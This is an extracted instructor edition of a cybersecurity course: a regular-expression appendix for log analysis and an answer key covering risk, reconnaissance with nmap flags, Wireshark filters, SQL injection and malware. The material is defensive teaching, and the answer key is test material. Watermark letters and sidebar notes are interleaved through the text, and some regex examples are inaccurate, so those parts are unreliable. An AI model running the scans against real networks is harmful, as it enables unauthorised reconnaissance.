(SIEMs), knowing how to craft a truly specialized search pattern is essential. In this topic, you'll use
regular expressions to home in on the exact data you're looking for out of your logs.
e
ut
Regular Expressions
Regular Expressions A regular expression (regex/regexp) is a group of characters that describe how to execute a
ib
Regular expressions can specific search pattern on a given text. Regular expressions are a much more powerful way to search
be a difficult concept for for specific strings in a text than standard string searches. Search operations using regular
students to grasp. expressions use a common syntax, which includes various special characters that have specific uses.
tr
Throughout this topic, This results in the search being able to retrieve granular results that it would otherwise not be able
assure them that the to.
is
expressions don't
necessarily need to be Consider the following dilemma: you have a log file, and you want to find a useful delimiter in this
perfect—as long as you log file to cut on. In many log files, information types are separated by some form of punctuation,
D
find what you're looking like colons, commas, periods, semicolons, etc. In the particular log file you're looking at, you know
for while avoiding false that each information type also has a space after the punctuation. So, how would you use a normal
positives. search string to find all of the punctuation in the log file that has a space after it? Simply using a
or
space (" ") as a search string won't work, because it'll also include spaces between words. You could
start writing a search string such as: ". " AND ": " AND ", " and so on until you've accounted
for every possible punctuation mark, but this will end up making the search string verbose.
e
Now consider the following regular expression:
at
\W\s
It may not be immediately obvious, but this short string will return every instance of a non-word
that is followed by a whitespace character. In regular expressions, a non-word is anything that is not
lic
a letter, number, or underscore. So, every punctuation mark followed by a space is covered by this
one expression. This is only a simple example of the potential power behind regular expressions.
up
Regular Expression Libraries

There are actually several different regular expressions that you can work with. The two most
common are Perl and Perl Compatible Regular Expressions (PCRE). The syntax for these two
D
libraries is mostly the same; the differences typically center on the logic, restraints, and capabilities of
each library.
ot
Search Operators
N
Quantification Operators The syntax for regular expressions behaves in similar ways to normal search strings. Searches are
read from left to right, and can include any normal, unformatted characters. What separates regular
expressions from their normal search counterparts is that they can include many different search
o
operators that are not read directly, but interpreted. These search operators provide you with the
ability to match repetitions in a pattern, limit the extent of that pattern, or configure your search in
D
some other advanced way.

Search operators in the first category perform basic quantification; that is, they can match repetitions
and specific numbers of instances of a pattern.
Appendix B : Regular Expressions | Topic A

Operator Description Example
* Matches zero or more instances of the 105* matches the "10" in "104", the
preceding character. "105" in "1052", and the "1055" in
"1055".
? Matches zero or one instance of the 105? matches the "10" in "104" and
preceding character. the "105" in "1052".
+ Matches one or more instances of the 105+ matches the "105" in "1052"
e
preceding character. and the "1055" in "1055".
ut
{n} Matches only n instance(s) of the 105{3} matches "10555".
preceding character.
{n,} Matches at least n instance(s) of the 105{1,} matches "105", "1055",
ib
preceding character. "10555", and so on.
{n,m} Matches between n and m instances of the 105{1,3} matches "105", "1055",
tr
preceding character (inclusive). and "10555".
is
Search operators in this next category are called anchors, as they prompt the search to match a Anchor Operators
specific location within the text.
D
^ Matches the position at the beginning of ^105 does not match "2105".
$
the following string.
Matches the position at the end of the
following string.
or
105$ does not match "1052".
e
at
The next category concerns character sets, which enable you to define a wide range of characters to Character Set Operators
match all at once.
lic
[ ... ] Matches any character within the set. The [0123456789] matches every
set is contained in the brackets. character in "1055". Likewise,
up
[abcdef] matches the "e" and "c" in

"security".
- Matches a range of characters within the [0-9] matches every character in
D
set. "1055". Likewise, [a-f] matches the

"e" and "c" in "security".
ot
^ Inside brackets, this negates a set. [^0123] matches the "5" in "105".
Matches any characters or range of Likewise, [^a-f] matches the "s",
characters not in the set. "u", "r", "i", "t", and "y" in "security".
N
This last category contains miscellaneous search operators you can include in your regular Miscellaneous Search
expressions. Operators
o

D
. Matches any character except for line 105. matches "1055", "1056",
breaks. "1057", and so on.
( ... ) Defines a subexpression with the pattern ([0-9]abc){2} matches
inside the parentheses. "5abc5abc". Without the parentheses
it matches "5abcc".


| The "OR" logical operator. Matches the 105|abc matches the "105" in
preceding string or the following string. "1055" and the "abc" in "abcdef".
\ Denotes the following character as a \W is a special operator matching all
special character or a literal character. A non-words. It matches the "!" in
literal character is used to "escape" a "1055!".
search operator.
\$ is a literal character that matches
e
the "$" in "$1055". Note that by
escaping the character, it does not
ut
perform its regular expression
function (anchoring the end of a
string).
ib
AWK-Specific Operators
tr
The AWK programming language contains a few extra operators that can be used alongside regular
expressions. These operators can be used for comparison or combination purposes. For example:
is
• ~ returns true if a field or expression (left operand) matches a regular expression (right operand).
For example: awk "$1 ~ /105+/" file.txt checks if the first field in a text file matches the
D
regular expression enclosed in slashes.
• && combines two regular expressions. For example: awk "/105+/ && /abc/" file.txt will
return lines from a file that match both regular expressions enclosed in slashes.
or
• ! checks if a regular expression is not present. For example: awk "! /105+/" file.txt returns
lines from a file that do not match the regular expression enclosed in slashes.
e
Special Operators
at
Special Operators Regular expression languages also include special operators that perform a variety of different
functions in an expression. All of these special operators are preceded by a slash character so they
lic
are not interpreted literally.

up
\w Matches a word. Words are defined as any 105\w matches "105a" and "1055".
letter, digit, or underscore.
\W Matches a non-word. 105\W matches "105!".
D
\d Matches any digit. 105\d matches "1055".

\D Matches any non-digit. 105\D matches "105a".
ot
\s Matches any whitespace. Whitespace is 105\s matches "105 ".

defined as a space, tab, return, or newline
N
character.
\S Matches any non-whitespace. 105\S matches "1055", "105a",
"105!", and so on.
o
\b Matches a word boundary. Word 105\b matches the "105" in "22105"

D
boundaries are defined as one side being but does not match the "105" in
any non-whitespace character, and the "21052".
other side being a whitespace character.
\B Matches a non-word boundary. 105\B matches the "105" in "21052"
but does not match the "105" in
"22105".


\c Matches the following control character. 105\cI matches "105" with a
A control character is a non-written horizontal tab after it (Ctrl+I).
symbol, like a tab or return.
Modifiers
Regular expressions can also be used with modifiers, which alter the behavior of the expression in
some way. They are typically placed at the end of the expression to modify the whole thing, but
e
some may also be placed inline to modify only part of the expression. The following are common
ut
modifiers:
• i ignores case sensitivity. Regular expressions are case sensitive by default.
• g is a global modifier that finds all matches rather than stopping after the first match.
ib
• m turns on multi-line mode, which forces anchors to match the beginning or end of each line,
rather than each string.
tr
• s turns on single-line mode, which forces the . operator to match line break characters.
is
Build an Expression
D
Writing a good regular expression can be difficult, so often the best tactic to take is to build one out Build an Expression
piece by piece. Consider using these
In this example, you want to search your logs for any entries that contain an IP address range that questions and the build
you know to be malicious—188.24.122.0/24.
or
In order to start building any regular expression, there are some questions you should ask:
• What are the commonalities that are shared by all instances of the thing I'm searching for?
process on another,
more complex
expression, like a search
for all IP addresses.
e
• In the example, all IP addresses start with a number from 0 to 255, then include a period,
at
then another number from 0 to 255, then a period, and so on.

• What can remain static in my search, and what must be variable?
lic
• In the example, the first three octets of the IP address are static—it's the last octet that will
change.
• Do I need to escape any characters that are used as operators?
up
• In the example, the periods between the octets don't change. However, the period is also a
regular expression operator, so it needs to be escaped.
• Does the expression need to be perfect? Is it "good enough"?
D
• IP octets stop at 255, but what are the chances that your logs include an invalid octet? In the
example, you don't necessarily need to limit the last octet to only numbers from 0 to 255—
any one to three digits should suffice.
ot
So, after answering these questions, you can begin to build the expression. The process can go Inform students that
something like this: sometimes building an
N
expression from left to

1. Write the first static octet, 188 right without skipping
2. Write an escaped period (\.) around can be more
3. Write the second static octet, 24 difficult. This is highly
o
4. Write an escaped period (\.) dependent on how

students think about the
D
5. Write the third static octet, 122 logic of an expression. In

6. Write an escaped period (\.) the process example,
7. You want to match any number that has one, two, or three digits. So, you can use the range steps 7 and 8 can be
search operator {n,m} to do this—in this case, it would be {1,3} swapped.
8. The range search operator matches 1 to 3 instances of whatever comes before it. Right now
that's a period, but you want it to be any digit. So, before the {1,3} add \d—the special operator
that matches any digit.

Verify that your expression is as follows: 188\.24\.122\.\d{1,3}

This finished expression will match any IP address in the 188.24.122.0/24 range. It might find
invalid addresses (like 188.24.122.389), but this is unlikely to be a problem. Therefore, the
expression is good enough to apply to your current log analysis efforts.
e
ut
ib
tr
is
D
or
e
at
Figure B-1: The process of building the IP address regular expression.

lic
Types of Searches
Keyword Searches How you use regular expressions will depend on what type of information you're looking for in your
up
Consider having log files. Because most logs share a common set of information, some expressions in particular will
students test these be of great use to you. You might easily find yourself using these expressions over and over
regular expressions at throughout the course of your duties, and you may even want to tweak the expressions so they are
https://regex101.com. more applicable in certain contexts. The following are examples of regular expressions germane to
D
This list of search types log analysis. Each part of the text that matches the example expression is underlined.
is best used as a
reference. If you choose Keyword Searches
ot
to teach through them,

consider doing so after These types of searches are useful when you know a certain keyword—like the word "error"—and
students complete the you need to search your logs for all entries that contain this keyword in a certain context. For
N
activity. example, you only want to show errors that were logged on one specific day. You can also use
keyword searches to search for keywords you've extrapolated from others. For example, if you've
identified malware that always calls its executable files malice123.exe, then you'll want to search
o
your system log for all executable file types (.bin, .exe, .bat, etc.) that have the malice123 name.
Examples:
D
• error/i
Use to: Search for errors in a log (case insensitive).
Match example: "Application Error: Forcing Restart"
• malice123\.\w{1,4}
Use to: Search for all files named "malice123" that have a standard file extension length.

Match example: "File malice123.bat request FindConversation succeeded"

• .+@.+\.[a-z]{2,4}
Use to: Search for email addresses that match standard conventions.
Match example: "Outlook account login successful: john.doe@develetech.com"
• ((0[1-9])|(1[0-2]))\/((0[1-9])|(1\d)|(2\d)|(3[0-1]))\/((\d{4}))
Use to: Search for dates in the format MM/DD/YYYY.
Match example: "02/24/2016 08:23:56 Audit Failure"
e
• (([01]\d)|(2[0-3]))(:[0-5]\d){2}
Use to: Search for times in the format HH:MM:SS (24-hour clock).
ut
Match example: "02/24/2016 14:23:56 Audit Failure"
Special Character
ib
Special Character Searches Searches
Searching for special characters can help you quickly identify elements like encoded URLs and even
tr
other regular expression searches that are recorded in application, server, and client logs. The key to
conducting most special character searches is to remember the importance of escaping characters to
is
create literals.
Examples:
D
• (http|https):\/\/.*\.[a-z]{2,4}\/.*\?.*
Use to: Search for URLs that pass in query strings.
• \{\d\,\d\}|\[\d\-\d\] or
Match example: "GET request denied: https://develetech.com/signin?var1=user&var2=pass"
Use to: Search a terminal log for entries that indicate a regular expression was performed.
e
Match example: "awk '/Feb\s1[0-5]/ && /10\.39\.5\.\d{1,3}/ syslog.txt'"
at
IP Address Searches
IP Address Searches
lic
Searching for IP addresses can help you easily find all log entries for a known malicious source or
destination. It can also help you discover the details of an attack performed against a server or other
host in your network.
up
Examples:
• 188\.24\.122\.\d{1,3}
Use to: Search for all logged IP addresses in the known malicious subnet 188.24.122.0/24.
D
Match example: "Source: 188.24.122.23 , Destination: 10.39.5.50"

• (\d{1,3}\.){3}\d{1,3}
ot
Use to: Search for all possible IP addresses (including some invalid ones) in a log.
• (19[2-9](\.\d{1,3}){3})|(2[0-2][0-3](\.\d{1,3}){3})
N
Use to: Search for all logged Class C IP addresses in range 192.x.x.x to 199.x.x.x.
o
Port Number Searches

D
Port Number Searches

There are times when you'll need to quickly identify what Transmission Control Protocol/User
Datagram Protocol (TCP/UDP) port a protocol or service is using to communicate. This can help
you verify that your firewall is blocking connections to the ports you specify. You can also
determine what service is causing trouble on a particular port.
Examples:

• ([1-9]\d{0,3}|[1-5]\d{4}|6[0-4]\d{3}|65[0-4]\d{2}|655[0-2]\d|6553[0-5])
Use to: Search for all possible port numbers in a log.
Match example: "ALLOW 1701 vpn.develetech.com"
• (49[2-9]\d{2}|491[6-9]\d|4915[2-9]|5\d{4}|6[0-4]\d{3}|65[0-4]\d{2}|
655[0-2]\d|6553[0-5])
Use to: Search a log for only port numbers in the dynamic and private range.
Match example: "src = 10.39.5.10 , dst = 10.39.5.50 , port = 55166"
e
• ([1-9][0-9]{0,2}|10[01]\d|102[0-3])
Use to: Search a log for only port numbers in the well-known range.
ut
Match example: "src = client00 , dst = https://www.develetech.com , port = 443"
ib
Guidelines for Writing Regular Expressions
tr
Guidelines for Writing
Regular Expressions Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
is
Use the following guidelines when writing regular expressions.
D
Write Regular Expressions
When writing regular expressions:
with several variables. or

• Use regular expressions over standard searches when you need to perform complex searches
• Know the various search operators, special operators, and modifiers common to most regular
e
expression libraries.
• Keep a reference card or other cheat sheet close by in case you forget what an operator or
at
modifier does.
• Use quantification operators to repeat a character or group multiple times.
lic
• Use anchor operators to ensure that you identify exact matches.

• Use character set operators to specify what characters or range of characters are allowed.
• Group subexpressions in parentheses.
up
• Escape characters that have special meaning by using a backslash.

• Use special operators to match all digits, words, and whitespaces, and their inverse.
• Use modifiers to adjust the behavior of the expression or subexpression (e.g., ignore case
D
sensitivity).
ot
N
o
D

ACTIVITY B-1
Parsing Log Files with Regular Expressions
Scenario
e
Analyzing logs with your SIEM has proven to be useful, but you'd still like a more sophisticated way
to parse these log files. So, you'll start writing regular expressions to get a more fine-tuned look at
ut
your data. Regular expressions will enhance your log analysis capabilities, and can even be applied in
many other search scenarios.
ib
Activity: Parsing Log
Files with Regular
1. To test out your ability to write regular expressions, you should start with a Expressions
tr
Throughout this activity,
simple example. A U.S. ZIP code, for instance, is five digits long, and can (for point students back to
the most part) include any digit in any of the five positions.
is
the material in this topic
when they need help
How would you write a regular expression to capture all possible ZIP codes? remembering symbols
D
A: The simplest way to write this expression is \d{5}—this searches for any combination of five and expression syntax.
digits. Consider having
students test their
2.
location. The format of extended ZIP codes is #####-####.
or
ZIP codes can also have a four-digit extension to further narrow down a
regular expressions at
https://regex101.com.
Consider stepping
through each component
e
How would you write a regular expression to capture all of these extended of each regular
ZIP codes? expression. This can
at
make it easier for

A: The expression \d{5}-\d{4} does the job. students to parse what
each component does,
lic
3. There are times when you don't know the exact format of something, or you and how the whole
want to capture multiple formats. expression comes
together.
up
In the ZIP code example, what if you wanted to capture all possible five-digit
ZIP codes or any extended ZIP codes?
A: You can use the "OR" logical operator to do this. The expression could be something like \d{5}-
D
\d{4}|\d{5}—this basically combines the two previous expressions using the pipe symbol to
indicate an alternative.
ot
4. You want to search your logs for any event that includes an error or failure
message.
N
In the following space, write a regular expression that searches for these
messages, regardless of capitalization.
o
A: A basic example is error|fail*/i

D

5. You also want to search for any log entries that include any email address.
Before you begin building your expression, answer these important questions.
What do all email addresses share in common? What, if anything, can remain
static in this expression? What characters will you need to escape? Does the
expression need to be perfect?
A: All email addresses are in the basic format localname@domain.tld. The length and specific
character requirements may vary; for example, top-level domains are generally not longer than
e
four characters, the entire address is usually not allowed to be over 255 characters, and some
systems do not allow certain special characters. Still, the @ symbol and the period are always
ut
going to be in an email address. Beyond this, nothing is really static, as you're trying to search for
all possible addresses. The only real character you need to escape is the period before the top-
level domain. The expression doesn't need to be perfect, and you may not even need to pay
ib
attention to character limits in the local name and domain sections.
6. In the following space, write out your regular expression to capture everything
tr
in an email address format.
is
A: A basic example is .+@.+\.[a-z]{2,4}—this works for most email addresses, but may not
include some of the latest top-level domain suffixes.
D
7. Write a regular expression that will capture all possible IP addresses.
Remember, your expressions don't need to be perfect to be functional.
or
A: A basic example is (\d{1,3}\.){3}\d{1,3}—though this example would allow illegal IP
addresses (greater than 255 for an octet, for example). This may be good enough for your
purposes, however, as you are unlikely to encounter invalid IP addresses in your logs.
e
8. When would you use regular expressions rather than normal searches in
logs?
at
A: Answers will vary, but may include searching for any string that you know only part of; version
numbers; timestamps; IP addresses; port numbers; user names; and more.
lic
up
D
ot
N
o
D

Solutions
e
ut
ib
ACTIVITY 1-1: Identifying the Importance of Risk
tr
Management
is
1. Why would these changes necessitate the re-evaluation of a risk
D
management strategy?
A: Answers will vary, but significant changes can bring about risk in many different ways. It may
become more challenging to secure sensitive information and keep it out of unauthorized
or
hands, or it may simply require more resources to secure more at-risk areas. Managing risk to
information and systems will help your organization avoid legal and financial disasters.
Additionally, there will be pressure from stakeholders, customers, and regulatory entities to
conform to their expectations and meet standardization requirements. There is also the chance
e
that an increase in the amount of communications in the organization will exponentially
increase the amount of risk that these communication channels take on. You need to make
at
sure changes to your organization can uphold risk management expectations.
What are the specific types of risk that could affect Develetech as it
lic
2.
expands its business?
A: Answers will vary, as there are many potential risks. Additional offices and warehouses will
up
require an infrastructure overhaul, which will require a reevaluation of infrastructural integrity.

Certain physical assets, including computers and networking equipment, may not be able to
sustain an increase in operational capacity. More personnel may increase the risk of a safety
incident. Failing to understand and adhere to laws and regulations, especially when moving
D
operations into a foreign country, may create legality issues for the organization. Financially, a
security breach could cost the organization a great deal, and its reputation may suffer as a
result. There may also be potential issues with the supply chain, which can have operational
ot
impacts on the business.
3. What risk analysis method would you prefer to use to determine

N
Develetech's risk exposure in this area, and why?

A: Answers will vary, but most organizations choose a combination of both quantitative and
qualitative analysis methods with an emphasis one way or the other. When it comes to risk,
o
there is not necessarily an objectively right answer. Quantitative analysis tends to be more
precise, but it's also expensive and not always feasible; qualitative analysis tends to be faster
D
and cheaper, but it's not always useful. Semi-quantitative analysis may be able to leverage the
strengths of both while minimizing their weaknesses. In any case, you may need more
information about a situation before the best approach becomes obvious.

ACTIVITY 1-2: Assessing Risk
1. What laws and regulations might Develetech be subject to?

A: Answers will vary, but among those discussed in this topic, Develetech is likely subject
to U.S. laws like SOX and CAN-SPAM. Develetech probably doesn't handle health
records, so HIPAA is unlikely to be relevant. Develetech is also likely subject to GDPR
since it does business all over the world, including the European Union.
e
2. How will both internal and external compliance factors influence
ut
your risk assessment?
A: Answers may vary. Your internal staff needs to comply with your risk management
ib
plan once it has been put in place. This usually means training certain staff is required;
otherwise, they might not be properly equipped to meet compliance requirements.
Because internal users access your systems constantly, they can bring a great deal of
tr
risk. Externally, your organization must comply with all applicable laws and regulations.
Even failure to comply with non-legally binding, industry-accepted standards may place
is
your organization's finances or reputation in jeopardy. However, external compliance will
not guarantee security. You may find that your risk is still too high even though you
adhere to security requirements.
D
3. What is the annual loss expectancy (ALE) for a flood damaging the
warehouse?
○ $800,000
◉ $200,000
or
○ $5,000,000
e
○ $20,000,000
at
lic
ACTIVITY 1-3: Mitigating Risk

up
1. What controls can you implement to round out your risk mitigation
strategy and uphold the components of the CIA triad?
A: Answers will vary, but a strong way to secure confidentiality is through encryption.
D
Encrypting the database will deter unauthorized users from making sense of the stored
data. You could also implement access control to prevent an intrusion before it even
begins. This will keep your databases out of the hands of an attacker. In addition, you can
ot
implement physical security measures in case an attacker has in-person access to these
databases.
N
2. To conduct a proper analysis of how this could bring risk to your

organization, what are some of the questions you need to ask?
o
A: Answers will vary, but you should ask how easily exploitable the flaw is, and what the
scope of an exploit could be. Can an exploit expose confidential information? Can it crash
D
the app or otherwise render other systems unavailable? What attack vectors exist that
could allow an attacker to carry out this exploit? What mitigation plans, if any, are in place
to address this flaw? How easily and quickly can you patch the flaw, and how will you
deploy it so that all of the app's users are covered?
Solutions
3. How will you respond to this risk?

A: The answer is debatable and may require more careful analysis. However, some may argue that the
strong input validation controls already in place imply that you should just accept the risk and save
yourself the time, effort, and cost of an active response. Others will say that this is inadequate because
it only accounts for known values, and that an attacker could find a way around the validation. This
would necessitate a response like mitigation, in which more application security controls are
implemented to harden the app against attack. Some might suggest transferring the risk to another
organization that can provide more reliable security. Some might even argue that the risk to your
customers' confidentiality is too great, and that you should avoid the risk entirely by dropping the
internally developed app and using a different solution.
e
ut
ACTIVITY 1-4: Integrating Documentation into Risk
ib
Management
tr
5. What are some other acceptable or unacceptable behaviors you can
is
incorporate in a policy like this one?
A: Answers will vary, but you could further assist help desk employees in defending against attacks by
D
forbidding communication using unauthorized channels like private Facebook and Skype accounts. You
can also take a more positive approach by outlining acceptable behavior when it comes to the content
of a help desk request; for example, the information that should be included in an email request so that
it's both useful to the help desk employee and secure at the same time. Likewise, you can encourage or
or
mandate email encryption to provide some measure of authentication and confidentiality in all such
requests.
Why is it important to maintain a revision history in policies like this one?

e
8.
A: Answers may vary, but security policies, procedures, and processes are living documents. This
at
means that, in the event of newly identified threats or vulnerabilities, you can adjust the document
accordingly. Documents that cannot keep up with ever-shifting organizational risk factors are unhelpful
to their intended audience. Recording a revision history will ensure there is a trail of changes and that
lic
each change is known in the context of when it was made, and that the person(s) who made the
changes are held accountable.
up
ACTIVITY 2-1: Constructing a Threat Profile

D
1. What attack technique criteria do you envision threat actors are most likely to
use in order to compromise this database?
ot
A: Answers will vary. Depending on the strength of any in-place security controls, an attacker may be
inclined to launch a direct attack on the database. This is more likely to net the attacker access to
N
everything in the database; however, if they are only searching for specific information, they may
choose more indirect means. Because the database is likely to already be hardened against attack,
attackers would probably opt to choose stealthy methods. This would ensure the attack remains
o
undetected before damage is done, and it may help the attacker cover their tracks afterward. However,
attackers interested more in causing damage and denial of service may forgo stealth to maximize their
D
impact.
Solutions
2. How could security vulnerabilities and exploitation tools shape the

vector a threat actor may use to attack the database?
A: Answers will vary. There are several potential vulnerabilities that could open the way
for an attacker. The database itself may be employing weak authentication mechanisms,
such as an easily guessed administrator password. The database may also use poor or
obsolete encryption, making it easy for the attacker to read the data once they've
accessed it. Outside the database, unpatched network authorization mechanisms could
give the attacker remote access to the database. As far as exploitation tactics, there are
many tools available that can capture network authentication packets as well as cause a
e
database to dump its contents. Certain payloads can also be injected into a database to
passively monitor new entries or changes.
ut
3. What do you believe are the most likely intentions an attacker has
when it comes to compromising the customer records database?
ib
A: Answers will vary. Theft is probably the most common intention in this case. An
attacker who is able to steal these records can sell them on the black market or to one of
tr
Develetech's corporate competitors. PII can be very useful to individuals and
organizations looking to gain an advantage over the company or its customers. Similarly,
is
an attacker may be directly spying on Develetech on behalf of one of its competitors to
see where its new products are strongest and gain an edge in the marketplace. More
personal or idealistic intentions, such as revenge and activism, are less likely; however,
D
depending on the company's actions and its relationship with the public, an attacker may
seek to humiliate the company by exposing such a crucial asset to the world.
4.
or
What do you believe are the most likely motives an attacker has for
compromising the customer records database?
A: Answers will vary. Assuming theft is the most likely intent, desire for money is the most
e
likely motive. An attacker can make a great deal of money selling PII. However, there are
many other possible motives: The attacker could have seen all of the recent data
at
breaches in the news and chosen to make a name for themselves by emulating these
breaches; the attacker may destroy the database rather than copy it, demonstrating they
have the power to do so; or the attacker may simply breach the database because they
lic
wanted to see if they could, and not necessarily to exfiltrate any data.
5. Using what you've determined for the previous questions, what

up
type of threat actor do you think is most likely to carry out a

compromise of the customer records database?
A: Answers will vary. It's unlikely that a script kiddie would even be able to breach such a
D
high-profile target. Likewise, there may not be much of a reason why a state-sponsored
hacker would go after an electronics manufacturer. More likely, the threat actor is either
an insider or cybercriminal. For the former, the threat actor already has significant access
ot
to their target, as well as extensive knowledge an external user would not possess. This
gives them a key advantage and can make their theft or destruction of the database much
easier to achieve. A cybercriminal will likely have the requisite skill to break into the
database from the outside, as they have probably made a career out of stealing personal
N
information.
o
D
Solutions
6. Based on your previous decisions, how would you describe the profile of the
most likely threat(s) to Develetech's customer records database?
A: Answers will vary depending on the answers to the previous questions, and you may believe that
multiple profiles are necessary. One example is as follows: The threat actor is likely an insider—
someone with knowledge of the database's structure, physical or logical location, and even its
credentials. The insider's motive is most likely a desire for money, as they know this database is very
valuable to identity thieves and corporate competitors. Rather than destroy the database or deny
service to it, the threat's intention is probably to copy the relevant data and exfiltrate it. The insider may
take advantage of the database's poor authentication methods to access it, and may use a code
e
injection exploit to dump the database. The insider is likely somewhat technically proficient if they've
gotten to this point, so they will probably try a stealthy approach and remove any traces that they have
ut
accessed the database.
ib
ACTIVITY 3-1: Analyzing a Threat Model
tr
2. Can you think of any specific attacks that might fall under the general
is
category of web server attacks?
A: Answers will vary, as there can be many potential attacks on a web server. The diagram provided
D
identifies three: Structured Query Language (SQL) injection attacks, cross-site scripting (XSS) attacks,
and file inclusion attacks. Additional attack types include cross-site request forgery (XSRF/CSRF)
attacks, directory traversal, and session hijacking.
4.
more of these subattacks?
or
Can you think of any specific countermeasures that might mitigate one or
e
A: Answers will vary, as there can be many countermeasures to these attacks. The diagram provided
identifies three: using parameterized queries to mitigate SQL injection; limiting or sanitizing user HTML
at
input to mitigate XSS; and creating whitelists and access identifiers to mitigate file inclusion attacks.
lic
6. What is the value in having this type of visual representation of a threat?

A: Answers may vary, but being able to visualize threats in a tree-like hierarchy can make it easier for
security personnel and even non-technical stakeholders to understand the security implications of
up
various technologies and processes that affect the organization. Attack trees are also a useful
component of a larger threat modeling strategy.
D
ACTIVITY 3-2: Performing Reconnaissance on a Network

ot
2. Under HOST DISCOVERY, what option runs a simple ping scan?

N
A: nmap –sn
3. Under SCAN TECHNIQUES, what option runs a TCP Connect() scan?

o
A: nmap -sT
D
4. Under OS DETECTION, what is the option to run an operating system

discovery scan?
A: nmap –O
5. Under OUTPUT, what does the –v option mean in Nmap?

A: More verbose responses for more detail in the scan.
Solutions
9. Why would you generally not wish to do that in a production

environment?
A: It generates a lot of traffic and could impact network performance.
11.Which host showed more port numbers active, and why?

A: The server has more port numbers open because it is a general purpose system rather
than a focused one like a router.
e
12.What are some of the open ports on your server? Are any of them
out of the ordinary?
ut
A: Answers will vary, but you'll see several ports you should expect to be open, like 53
(DNS) and 389 (LDAP). However, an open port like 22 (SSH) may potentially be used as
ib
an attack surface.
tr
ACTIVITY 3-3: Examining Reconnaissance Incidents
is
What were the source and destination IP addresses of this packet?
D
2.
A: Source = 10.39.5.6 and Destination = 10.39.5.2
4. What was the destination port?

A: 443, commonly used by HTTPS. or
e
5. What flags were set for this packet?
A: SYN (synchronize sequence numbers). A synchronization request is the first packet
at
sent in a TCP session.

lic
8. What did the attacker do?

A: The attacker started a session (SYN), received the server response (SYN-ACK), and
then reset it (RST). This is called a stealth scan because it interrupts a connection before
up
it can be completed, potentially evading automated detection systems.
10.What did the attacker do in this case?

D
A: The attacker tried to connect using the Telnet protocol (port 23) but was refused by the
server.
11.What was the attacker trying to discover from your system in this
ot
attack?
A: Which port numbers were open and which were not. In other words, a port scan.
N
12.How could the attacker proceed after learning this information?

o
A: The attacker could see what services are running on open ports and try to attack those
services.
D
Solutions
ACTIVITY 3-4: Capturing and Analyzing Data with Wireshark
3. Are the ones in your capture actually an indication of a problem in this case?
A: Not necessarily. Many are time-exceeded errors that are traceroute's way of determining the routers
along the path you specified (in this case, the path to Microsoft's website).
9. After testing it, what filter worked for you?
e
A: The easiest way to filter for TCP SYN traffic would be by using tcp.flags.syn==1. You can also
ut
achieve the same result if you use tcp.flags==0x02 || tcp.flags==0x12 as the filter expression.
11.Why do some ICMP requests have no answer?
ib
A: This was part of traceroute. Once it got to a firewall, the remaining echo requests were filtered so
they had no answering packet.
tr
12.What are the strengths of Wireshark as an analysis tool?
is
A: Answers will vary, but may include that it sees every packet the interface sees, it has some advanced
analysis capability, and the filters enable you to break down the capture by almost any metric.
D
13.What are some weaknesses of Wireshark for packet analysis?
A: Answers will vary, but may include that it only sees what the interface it's connected to does (which
or
has limited use in a switched network); the captures can only be automated through the use of third-
party tools; and the program has very little intelligence for detecting suspicious behavior, unlike intrusion
detection systems/intrusion prevention systems (IDSs/IPSs).
e
14.Can Wireshark tell you if certain traffic indicates an attack?
at
A: No—you must be able to analyze the capture and make that determination.
lic
ACTIVITY 3-5: Assessing the Impact of Social Engineering

up
6. What could make this attack more difficult for the attacker?
A: Answers may vary. Encouraging employees to use Google's two-factor authentication would help
mitigate this type of pharming attack. Also, implementing user policies that discourage clicking
D
unsolicited links could also help prevent the attack from succeeding.
7. What could make this attack more effective?

ot
A: Answers may vary. An attacker may be able to fool the users more easily if the link itself is
believable, especially if they're spoofing a major website like Google. Likewise, they may choose to
N
spoof a less well-known site to catch the users off guard. This is especially effective if they've convinced
the users they need to enter their credentials for official reasons.
o
8. What is the most significant weak spot that enables attacks like these to
succeed, and what can be done to fix the problem?
D
A: Answers may vary, but almost always, it's the human factor that is the weakest point in social
engineering attacks. Preventing these types of attacks from succeeding requires security awareness
training and fostering a cybersecurity culture within the organization.
Solutions
ACTIVITY 4-1: Assessing the Impact of System

Hacking Attacks
4. Do you know anyone who uses one of these passwords?

A: Answers will vary, but most people know at least one person who uses common,
insecure passwords like these.
e
7. What other harm could the attacker do with this access?
ut
A: Answers will vary, but the options are almost limitless—they could delete files, install
programs, and download malware for just a few examples.
ib
A: Answers may vary, but the most pressing issue is to enforce a stronger password
tr
policy that rejects such a common and simple password, especially for the administrator.
You can also limit the number of password attempts or disable SSH connections entirely.
is
D
ACTIVITY 4-2: Assessing the Impact of Web-Based
Threats
6.
password fields in the query?
or
How does the form automatically format the user name and
e
A: It adds an opening and closing apostrophe for each field, encasing the field in a string
at
literal.
8. What are some other ways an attacker could compromise the

lic
database with SQL injection?

A: Answers may vary, but the attacker could drop entire tables, edit individual row entries,
up
dump the contents of the members table to see more user login information, and even log
in as specific users.

D
A: Answers may vary, but one of the most common and useful tactics to deal with SQL
injection is the use of parameterized queries, also known as prepared statements. The
quotation marks in the sign-in injection, for example, would be interpreted literally if the
ot
query were parameterized.

N
ACTIVITY 4-3: Assessing the Impact of Malware

o
2. According to Sophos, why have average ransom payouts been

D
increasing over the past few years?

A: Sophos implies that there is a hierarchy (or weight classes, to use their metaphor) to
modern ransomware attacks. Attacks on a few large corporations tend to skew the
averages because these corporations can afford to pay a much larger ransom—and
attackers know it. Attacks on smaller organizations and individuals are less profitable, so
those payouts tend to remain constant.
Solutions
4. According to Sophos, what is the most common delivery mechanism for

ransomware, and why?
A: Windows' Remote Desktop Protocol (RDP) is the most common delivery mechanism for
ransomware. Attackers can gain entry into remote computers through RDP just as any user, enabling
them to spread the infection much more easily. RDP has become an even more prominent vector in the
wake of the COVID-19 pandemic as more people work from home and need to access their computing
environments remotely.
6. What categories of malware do security researchers believe will be
e
prominent? What new categories of malware might arise? What new or
ut
changing delivery mechanisms and attack vectors might malware take? What
other predictions about malware did you discover?
ib
A: Answers will vary greatly depending on the time when the class is taught and what web-based
resources you find. Ransomware will likely continue to be prominent well into the future, especially
attacks targeting the healthcare industry. Malware may take advantage of artificial intelligence (AI) to
tr
better avoid detection and cause more harm. Malware targeting edge devices like those used in IoT and
remote work is also likely to grow in prominence.
is
9. What alert level did Windows Security assign the threat? What category of
malware is this file? What does quarantining a file in Windows Security do?
D
A: Windows Security assigned this threat an alert level of Severe. The file is a virus, and Windows
Security automatically placed it in a restricted area where it can't affect the rest of the computer.
11.What or
value does this EICAR test file have in developing and testing anti-
malware systems?
e
